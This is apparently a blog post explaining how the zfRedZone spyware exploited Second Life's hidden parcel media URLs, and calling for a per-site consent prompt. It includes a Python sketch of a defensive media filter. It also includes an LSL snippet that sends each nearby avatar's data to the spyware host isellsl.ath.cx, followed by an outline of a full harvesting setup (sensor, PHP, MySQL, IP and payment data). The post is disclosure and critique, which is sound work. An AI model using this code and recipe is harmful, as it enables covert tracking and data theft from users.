I have mentioned that zfRedZone spyware works by exploiting a security hole in the Second Life client software. The hole is this: It is possible to write a script that delivers a specific parcel media URL to a specific detected avatar. The makers of Second Life felt that users would like the ability to write scripts that would allow other users to select an audio or video stream they like and to watch or listen to this on a sim whilst other users could view different content. You can see how this is useful. When I was last at the ISM, they used this to deliver a selection of very interesting videos.
But then people got paranoid. Because if a mere user is allowed to actually see the parcel media URL that is delivering them content, what is to keep them in world in a sim where they frequently crash, and where videos must then be restarted from the beginning? Why wouldn’t they just fire up this URL in a streaming media client on their computers?
So to keep people in world, the URLs had to be hidden. We are not supposed to know who is feeding us the content. There are some fairly simple ways to discover the URLs, but the Second Life client does not tell us. And that is a key failing.
The other key failing is there is no security warning for parcel media. You are being redirected to an external site that Linden Labs makes quite clear in their TOS is outside of their control. You are being delivered content from that site, and yet your options are on or off. What is missing from the Second Life client is an option that says “The site isellsl.ath.cx would like to deliver you parcel media. Would you like to accept?”
If we had such an option, we would see at once the highly suspicious nature of the URL isellsl.ath.cx sends us, and we could then use a “no” option to ignore the “content”. Indeed a “never for this site” option would be more secure. This would also protect us from copycat sites, whilst still allowing us to enjoy the Second Life experience as it was intended.
So Linden Labs and other client developers: how about it? I will immediately change to whichever SL client offers me this option.
Although if Phoenix Viewer did it, I suspect the developers might find themselves under attack from Linden Labs for revealing those “secret” parcel media URLs.
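The prompt asked for above can be sketched as a per-host filter that a client consults before it requests any parcel media. This is an added example, not code from Second Life or any viewer; the MediaFilter class, its method names, the accepted schemes and the stream.example.org host are assumptions made for illustration.

```python
from urllib.parse import urlsplit, parse_qsl

ALLOW, DENY, PROMPT = "allow", "deny", "prompt"
SCHEMES = ("http", "https")  # assumption: schemes this sketch accepts

class MediaFilter:
    """Per-host consent for parcel media, checked before any request is sent."""

    def __init__(self):
        self.always = set()  # hosts answered "always allow"
        self.never = set()   # hosts answered "never for this site"

    @staticmethod
    def host_of(url):
        """Host that would really be contacted, normalised; None if unusable."""
        try:
            parts = urlsplit(url.strip())
            host = parts.hostname  # lowercased, userinfo and port removed
        except ValueError:
            return None
        if parts.scheme not in SCHEMES or not host:
            return None
        return host.rstrip(".")

    def decide(self, url):
        """Return (decision, host, prompt_text); text is set only for PROMPT."""
        host = self.host_of(url)
        if host is None or host in self.never:
            return DENY, host, None
        if host in self.always:
            return ALLOW, host, None
        text = f"The site {host} would like to deliver you parcel media.\nURL: {url}"
        names = [k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)]
        if names:  # show what the request would carry besides a stream path
            text += "\nQuery parameters sent with the request: " + ", ".join(names)
        return PROMPT, host, text

    def remember(self, url, choice):
        """Persist an 'always' or 'never' answer for the URL's host."""
        host = self.host_of(url)
        if host is None or choice not in ("always", "never"):
            return
        keep, drop = (self.always, self.never) if choice == "always" else (self.never, self.always)
        drop.discard(host)
        keep.add(host)

if __name__ == "__main__":
    f = MediaFilter()
    # Host and path are from the post; the value of n is constructed.
    print(f.decide("http://isellsl.ath.cx/rz2.php?e=pscan&n=CONSTRUCTED")[2])
```

Matching on the parsed host rather than on the URL text means a “never” answer still holds when the same site is reached with different casing, an explicit port, a trailing dot or a misleading userinfo prefix.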
Anyway, for interest, the code to exploit the parcel media bug looks like this:
integer agentNum;
for (agentNum = 0; agentNum < num_detected; agentNum++)
{
    key thisKey = llDetectedKey(agentNum);
    string myurl = "http://isellsl.ath.cx/rz2.php?e=pscan&n=";
    myurl += secretsauce(thisKey);
    // The rest of the URL contains the data gathered from a sensor.
    // I don't include all the code for doing so. You need the dataserver.
    // PARCEL_MEDIA_COMMAND_AGENT applies the media URL to this one avatar only.
    llParcelMediaCommandList([PARCEL_MEDIA_COMMAND_AGENT, thisKey, PARCEL_MEDIA_COMMAND_URL, myurl]);
}
Now add a sensor script that finds everyone nearby and delivers each one of them a custom URL using the information you just scanned from them (UUID, payment information, avatar age and of course name) and with a PHP back end that funnels the data into a MySQL database, and you have just written your own version of RedZone. The HTTP GET request will provide you with User Agent string and IP address – and even a cookie if you try hard enough. Of course you then need to convince lots of people to gather data for you – and if possible to pay for that privilege. To do that part you have to be both greedy and amoral though, so I presume no reader of this blog would do such a thing.